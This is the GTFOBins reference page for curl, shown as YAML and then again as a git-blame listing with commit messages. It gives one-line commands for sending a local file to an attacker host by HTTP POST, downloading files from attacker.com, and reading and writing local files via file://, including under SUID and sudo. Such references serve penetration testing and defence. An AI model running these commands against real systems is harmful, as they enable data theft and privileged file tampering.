GTFOBins.github.io/_gtfobins/curl.md

---
functions:
  file-upload:
    - description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Omit the `@` to send hard-coded data.
      code: |
        URL=http://attacker.com/
        LFILE=file_to_send
        curl -X POST -d "@$LFILE" $URL
  file-download:
    - description: Fetch a remote file via HTTP GET request.
      code: |
        URL=http://attacker.com/file_to_get
        LFILE=file_to_save
        curl $URL -o $LFILE
  file-read:
    - description: The file path must be absolute.
      code: |
        LFILE=/tmp/file_to_read
        curl file://$LFILE
  file-write:
    - description: The file path must be absolute.
      code: |
        LFILE=file_to_write
        TF=$(mktemp)
        echo DATA >$TF
        curl "file://$TF" -o "$LFILE"
  suid:
    - description: Fetch a remote file via HTTP GET request.
      code: |
        URL=http://attacker.com/file_to_get
        LFILE=file_to_save
        ./curl $URL -o $LFILE
  sudo:
    - description: Fetch a remote file via HTTP GET request.
      code: |
        URL=http://attacker.com/file_to_get
        LFILE=file_to_save
        sudo curl $URL -o $LFILE
---
First commit 2018-05-21 21:14:41 +02:00			`---`
			`functions:`
Adopt new function names 2018-10-05 19:55:38 +02:00			`file-upload:`
Get rid of base64 for curl and wget and make descriptions similar Close #24. 2018-09-25 19:51:20 +02:00			- description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Omit the `@` to send hard-coded data.
Fix YAMLs according to YAMLlint 2018-07-16 15:01:50 +02:00			`code: \|`
			`URL=http://attacker.com/`
			`LFILE=file_to_send`
Fix curl file-upload Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com> 2022-12-16 15:15:44 +01:00			`curl -X POST -d "@$LFILE" $URL`
Adopt new function names 2018-10-05 19:55:38 +02:00			`file-download:`
Fix YAMLs according to YAMLlint 2018-07-16 15:01:50 +02:00			`- description: Fetch a remote file via HTTP GET request.`
			`code: \|`
			`URL=http://attacker.com/file_to_get`
			`LFILE=file_to_save`
			`curl $URL -o $LFILE`
Add file-read to curl 2018-06-10 10:49:59 +02:00			`file-read:`
Fix YAMLs according to YAMLlint 2018-07-16 15:01:50 +02:00			`- description: The file path must be absolute.`
			`code: \|`
			`LFILE=/tmp/file_to_read`
			`curl file://$LFILE`
Add curl file-write 2021-04-11 12:10:42 +02:00			`file-write:`
			`- description: The file path must be absolute.`
			`code: \|`
			`LFILE=file_to_write`
			`TF=$(mktemp)`
			`echo DATA >$TF`
			`curl "file://$TF" -o "$LFILE"`
Adopt new function names 2018-10-05 19:55:38 +02:00			`suid:`
Add suid-enabled and sudo-enabled to curl, dd, and wget 2018-07-22 15:30:03 +02:00			`- description: Fetch a remote file via HTTP GET request.`
			`code: \|`
			`URL=http://attacker.com/file_to_get`
			`LFILE=file_to_save`
			`./curl $URL -o $LFILE`
Adopt new function names 2018-10-05 19:55:38 +02:00			`sudo:`
Add suid-enabled and sudo-enabled to curl, dd, and wget 2018-07-22 15:30:03 +02:00			`- description: Fetch a remote file via HTTP GET request.`
			`code: \|`
			`URL=http://attacker.com/file_to_get`
			`LFILE=file_to_save`
Remove useless instances of sudo -E 2020-06-10 22:53:45 +02:00			`sudo curl $URL -o $LFILE`
Fix trailing spaces 2018-05-25 01:10:39 +02:00			`---`